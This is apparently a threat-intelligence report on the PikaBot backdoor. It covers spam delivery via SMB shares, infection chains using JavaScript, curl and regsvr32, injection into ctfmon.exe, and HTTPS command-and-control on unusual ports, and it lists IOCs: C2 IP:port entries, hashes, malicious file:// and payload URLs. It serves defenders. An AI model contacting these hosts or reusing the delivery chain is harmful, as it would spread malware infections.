Keypoints
- PikaBot is a modular backdoor composed of a loader and a core module that injects into legitimate processes.
- The malware primarily spreads via targeted email spam campaigns that link to SMB shares hosting malicious zip files.
- Observed campaigns use diverse attachment types: HTML (meta-refresh), JavaScript (executes curl/cmd), SMB links, Excel (embedded SMB hyperlinks), and JAR files.
- Infection chains vary by campaign (e.g., .zip → .js → curl → .exe; .zip → .jar → .dll; .zip → .xls → .js → .dll), often executing payloads via regsvr32.exe.
- The loader allocates memory, decrypts a bundled PE, and the core injects into ctfmon.exe; a hardcoded mutex prevents double infection.
- Network activity uses HTTPS over non-traditional ports (examples: 2221, 2078) to communicate with C2 servers.
- IOCs published include multiple SHA-256 hashes for zip/html/js/exe/jar/dll samples and specific C2 IP:port entries.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Initial access via targeted spam emails with malicious attachments or links ((‘PikaBot, along with various other malicious loaders … heavily depends on email spam campaigns for distribution.’)).
- [T1204.002] User Execution: Malicious Link – Use of HTML meta refresh and file:// links to force client-side retrieval of malicious files ((‘meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’’)).
- [T1021.002] Remote Services: SMB/Windows Admin Shares – Distribution and propagation via SMB shares and Outlook MonikerLink exploitation ((‘these emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files’ and ‘attaches an SMB link in the Outlook mail itself.’)).
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – JS files spawn cmd.exe and curl.exe to create directories and download payloads ((‘triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.’)).
- [T1218.010] Signed Binary Proxy Execution: regsvr32.exe – Execution of downloaded DLL payloads via regsvr32.exe to load malicious code ((‘The downloaded DLL payload is executed by regsvr32.exe.’)).
- [T1055] Process Injection – Core module injects decrypted PE into a legitimate process (ctfmon.exe) using code injection ((’employs a code injector to decrypt and inject the core module into a legitimate process’ and ‘injects the malicious content in ctfmon.exe’)).
- [T1027] Obfuscated Files or Information (Packing/Encryption) – Loader uses custom decryption loop and high-entropy packed resources to conceal the embedded PE ((‘relatively high entropy of the resource section … employs a custom decryption loop to decrypt the data, resulting in a PE file’)).
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communication over HTTPS ((‘PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).’)).
- [T1043] Commonly Used Port – Use of non-standard ports for HTTPS to evade detection and blend C2 traffic ((‘over HTTPS on non-traditional ports (2221, 2078, etc).’)).
Indicators of Compromise
- [IP:Port C2] Command-and-control servers observed – 178.18.246.136:2078, 86.38.225.106:2221, and 57.128.165.176:1372
- [File hashes] Sample SHA-256 examples (payloads and droppers) – 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a (ZIP), 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9 (EXE), and 10 more hashes
- [Domains/URLs/SMB] Malicious file locations and links used in campaigns – file://newssocialwork.com/public/FNFY.zip, file:///85.195.115.20/sharereports_02.15.2024_1.js, and hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat
- [File names / artifacts] Notable payload or artifact names – nh.jpg (DLL payload renamed), and dropped payloads in %TEMP% like ‘163520’ extracted as .png before execution
PikaBot campaigns deliver a range of malicious artifacts and rely on user interaction to execute retrieval and payloads. Attackers used specially crafted spam emails pointing to SMB shares or hosting compressed attachments; examples include HTML files that perform a meta-refresh to file:// URLs, JavaScript files that spawn cmd.exe and curl.exe to download executables, Excel sheets that embed SMB hyperlinks to .js files, and JAR archives that drop DLLs into %TEMP% for execution. Infection chains observed include: .zip → .js → curl → .exe, .zip → .xls → .js → .dll (executed via regsvr32.exe), and .zip → .jar → .dll (JAR drops resource renamed as .png then executed).
On the host, the loader exhibits high-entropy packed resources, allocates memory with VirtualAlloc, and uses a custom decryption loop to produce an in-memory PE. The decrypted core is executed and injected into a legitimate process (ctfmon.exe) with a specific command-line argument; the sample also uses a hardcoded mutex ({9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524}) to avoid double infection. Execution and persistence techniques include regsvr32-based DLL execution and process injection to run malicious code within trusted processes.
Network behavior shows encrypted C2 communications over HTTPS using non-standard ports (examples: 2221, 2078), with multiple IP:port endpoints embedded in the payloads. Defenders should monitor for the listed C2 endpoints, the provided SHA-256 sample hashes, SMB file:// links appearing in emails or Office relationships, unusual regsvr32 activity loading payloads like nh.jpg, and processes spawning curl/cmd from JavaScript or Java launching regsvr32.